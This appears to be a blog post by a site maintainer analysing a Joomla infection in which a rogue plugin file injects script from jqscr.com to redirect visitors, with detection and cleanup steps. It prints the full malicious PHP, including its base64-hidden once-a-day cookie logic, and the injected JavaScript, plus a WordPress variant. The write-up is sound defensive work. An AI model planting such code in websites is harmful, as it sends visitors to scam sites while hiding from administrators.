Joomla Site Infected With khutmhpx.src = jqscr.com/XXxxxXXn

On a site I support I found this infected code in the /plugins directory. The infected file injects JavaScript code into the top of the rendered HTML page, above the <head> tag. The infected file only runs once a day, per user, so it’s hard to spot.

For a user’s first visit of the day, when not logged in, a PHP script runs. The PHP injects JavaScript, that in turn injects jqscr.com/XXxxxXXn. On the page load the user gets redirected away from the site, usually to a “spammy” website.

One way to tell if a site is infected is view the source code of the homepage in a new incognito window. Is there any JavaScript above the <head> tag? Another way is check the browser for a cookie, on the domain, named r_ok with the value of 1.

We only found this hack, because this client emailed a large mailing list. When these people clicked the link, they got redirected to a spammy site. Many of them reported this strange behavior back to us.

JavaScript Injected Above The <head> Tag

The following JavaScript was injected above the head tag, on a Joomla site. I redacted the page name to XXxxxXXn for the scripts src, assuming the original page name is a unique tracking code. The injected script looks like this:

<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://jqscr.com/XXxxxXXn";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>

What the code above is doing:

1. imports a jquery v3.3.1 script library
2. creates var khutmhpx as script tag.
3. sets khutmhpx src to https://jqscr.com/XXxxxXXn
4. appends khutmhpx to the html head
5. executes khutmhpx on the page load
6. https://jqscr.com/XXxxxXXn then redirects the visitor off the site

The Scope Of This Hack Is growing: 

On March 22 2023 publicwww.com showed 196 sites infected with jqscr.com. Infection grew throughout Spring ’23 to it’s peaked in May, then started to decline:

• March 22: 196 sites 
• April 18th: 1332 sites 
• May 4th: 1552 sites 
• June 6th: 1185 sites
• July 21st: 994 sites
• August 21st: 888 sites

The Infected Joomla Code (PHP)

The infected code is injection from /plugins/system/settings/settings.php. This is not part of the real Joomla settings. This is just a random php file in the /plugins directory. I assume this was copied there by some other Joomla Plugin or Component, but I do not know yet which one.

The main part of /plugins/system/settings/settings.php looks like this:

if ( $user -> id > 0 ) {
    // user route
} else {
    // non-user route
    $current_url = JUri::getInstance();
    if (stristr($current_url, "/admin")) {
        // admin-panel route
    } else {
            
        if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) {
            setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
            echo '
            <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
            <script>
            var khutmhpx = document.createElement("script");
            khutmhpx.src = "https://jqscr.com/XXxxxXXn";
            document.getElementsByTagName("head")[0].appendChild(khutmhpx);
            </script>
            ';
        }
    }
}

What /plugins/system/settings/settings.php code shown above is doing:

• if ( $user -> id > 0 ) { ignores visitors who are logged in.
• if (stristr($current_url, "/admin")) { ignores pages in the “/admin” path, that’s a little odd because Joomla uses “/administrator/”.
• if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) { setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) ); limits execution to just once a day by setting a cookie for 86400 seconds (24 hours). That’s a good trick. When you go back to the page to try to figure out what happened, the script will be gone.
• echo ' <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script> <script> var khutmhpx = document.createElement("script"); khutmhpx.src = "https://jqscr.com/XXxxxXXn"; document.getElementsByTagName("head")[0].appendChild(khutmhpx); </script> '; injects the jquery library and javascript code above the <head>.

The cookie name base64_decode( 'cl9vaw==' ) decodes to r_ok. If the site has a cookie on your domain named r_ok, with the value of 1, the site is infected.

Mitigation

Remove the hack by deleting the code in: /plugins/system/settings/settings.php.

What I have done for now is remove the echo of the khutmhpx injection script from settings.php, and modify the cookie. The modify cookie duration is 30 days, and the value is set to “plugin disabled”. I can monitor the cookie’s value to make sure this rogue script has not been reinstalled.

setcookie( base64_decode( 'cl9vaw==' ), 'plugin disabled', time() + 86400 * 30, base64_decode( 'Lw==' ) );

I’m still not sure yet how this hack got on this Joomla site. I did not build this site, and it uses a lot of plugins. About 1/2 of them I’ve never used before. So I need to backtrack and review each plugin and component that was upgraded over the last month when the hack was installed.

Have you seen this hack? Any ideas where it came from?

Similar To A Hack On WordPress

There is/was a similar hack on WordPress websites last year. Reported on SUCURI in March 2022. The injected script is 99% the same, just the target scr has changed. The old src was https://jquery0.com/XXxXXxxX. Same jquery-3.3.1.min.js, same var khutmhpx, same, document.getElementsByTagName("head")[0].appendChild(khutmhpx):

var khutmhpx = document.createElement('script');
khutmhpx.src = 'https://jquery0.com/XXxXXxxX';
document.getElementsByTagName('head')[0].appendChild(khutmhpx);

https://blog.sucuri.net/2022/12/fake-jquery-domain-redirects-site-visitors-scam.html